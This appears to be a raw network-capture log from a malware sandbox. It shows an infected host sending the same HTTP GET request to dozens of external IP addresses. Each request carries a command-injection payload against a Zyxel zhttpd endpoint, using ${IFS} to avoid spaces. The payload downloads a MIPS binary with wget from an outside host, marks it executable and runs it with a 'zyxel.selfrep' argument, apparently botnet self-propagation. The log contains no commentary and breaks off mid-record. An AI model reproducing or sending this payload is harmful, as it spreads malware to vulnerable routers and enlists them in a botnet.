                                      Jan 19, 2024 17:29:19.508411884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      979192.168.2.1448774221.54.212.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508445024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      980192.168.2.145539885.120.64.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508476973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      981192.168.2.1437108197.94.141.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508534908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      982192.168.2.144270440.7.99.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508574963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      983192.168.2.1457266112.14.100.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508604050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      984192.168.2.146023644.141.68.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508642912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      985192.168.2.143482093.147.16.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508667946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      986192.168.2.1449220155.179.237.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508686066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      987192.168.2.1455192172.246.246.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508749962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      988192.168.2.145077454.146.35.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508785963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      989192.168.2.1438048117.2.213.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508850098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      990192.168.2.144828852.59.119.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508883953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      991192.168.2.143674641.192.33.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508913994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      992192.168.2.144405270.59.238.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.508960009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      993192.168.2.1442114177.206.142.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509026051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      994192.168.2.145276632.138.71.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509057999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      995192.168.2.1449520169.107.153.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509123087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      996192.168.2.1436580159.86.88.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509159088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      997192.168.2.1434960220.193.41.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509208918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      998192.168.2.145965844.164.169.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509233952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      999192.168.2.1455632164.22.154.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509301901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1000192.168.2.1452520110.138.102.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509392977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1001192.168.2.1442272136.189.249.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509418964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1002192.168.2.1446862170.36.198.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509466887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1003192.168.2.1445360191.41.129.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509501934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1004192.168.2.14486104.117.208.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509565115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1005192.168.2.144000897.224.3.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509604931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1006192.168.2.144190832.189.133.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509629011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1007192.168.2.143485064.34.48.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509660006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1008192.168.2.1445308192.252.91.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509717941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1009192.168.2.1457120121.231.137.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509752035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1010192.168.2.1442558141.92.236.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509789944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1011192.168.2.1443562116.188.177.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509835958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1012192.168.2.144424659.245.220.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509871960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1013192.168.2.144873044.82.253.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509907961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1014192.168.2.144680696.175.24.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509948969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1015192.168.2.1440734126.226.228.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.509999037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1016192.168.2.1436828183.109.124.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510031939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1017192.168.2.1443954212.4.252.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510055065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1018192.168.2.1436432141.101.223.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510109901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1019192.168.2.1442670146.190.27.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510134935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1020192.168.2.1436206165.13.100.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510190964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1021192.168.2.1440090121.183.250.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510236979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1022192.168.2.145850247.116.94.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510267973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1023192.168.2.1459324183.88.30.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510296106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1024192.168.2.1434708147.162.45.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510340929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1025192.168.2.143810417.208.13.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510390997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1026192.168.2.1460376180.87.78.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510468960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1027192.168.2.1437944177.172.27.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510476112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1028192.168.2.1448776150.187.115.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510513067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1029192.168.2.144309687.20.43.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510561943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1030192.168.2.1450734153.73.221.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510588884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1031192.168.2.146015691.146.72.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510632038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1032192.168.2.1440190121.199.117.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510680914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1033192.168.2.1445678170.140.15.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510708094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1034192.168.2.144676887.135.25.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510746002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1035192.168.2.144810419.89.227.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510798931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1036192.168.2.1444720223.113.164.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510829926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1037192.168.2.1460036213.77.181.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510860920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1038192.168.2.1445834154.4.88.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510919094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1039192.168.2.145098040.125.226.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510961056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1040192.168.2.1440268122.123.175.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.510978937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1041192.168.2.144434819.53.112.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.511039972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1042192.168.2.143535819.2.25.219443
                                      TimestampBytes transferredDirectionData
